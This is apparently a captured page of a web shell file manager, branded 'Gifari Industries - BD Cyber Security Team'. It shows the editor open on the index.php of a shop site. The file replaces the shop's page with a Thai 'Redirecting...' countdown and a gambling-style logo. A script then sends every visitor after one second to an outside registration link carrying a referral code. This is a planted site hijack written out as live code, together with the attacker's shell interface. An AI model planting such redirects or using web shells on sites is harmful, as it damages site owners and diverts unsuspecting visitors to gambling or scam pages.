Sid Gifari From Gifari Industries - BD Cyber Security Team
Home
/
home
/
millwino
/
tekabuzz.pk
/
shop
/
✏️
Editing: index.php
<!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <title>Redirecting...</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> body { font-family: Arial, sans-serif; background: #000; text-align: center; padding-top: 100px; color: #fff; } .spinner-container { position: relative; width: 80px; height: 80px; margin: 0 auto 20px auto; } .spinner { width: 80px; height: 80px; border: 6px solid #ffffff; border-top: 6px solid red; border-radius: 50%; animation: spin 1s linear infinite; } .logo { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 40px; height: 40px; border-radius: 8px; } .countdown { font-size: 20px; color: #ff0000; font-weight: bold; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> </head> <body> <div class="spinner-container"> <div class="spinner"></div> <img src="https://cdn.probestads.com/image/mbkslot_0708429001767267225.png" alt="Logo" class="logo"> </div> <div class="countdown"> คุณจะถูกเปลี่ยนเส้น <span id="timer">1</span> วิน... </div> <script> let seconds = 1; const timerElement = document.getElementById("timer"); const redirectUrl = "https:\/\/iizin-alex.com\/register?rc=seolim"; const countdown = setInterval(() => { seconds--; if (seconds <= 0) { clearInterval(countdown); window.location.href = redirectUrl; } else { timerElement.textContent = seconds; } }, 1000); </script> </body> </html>
💾 Save
❌ Cancel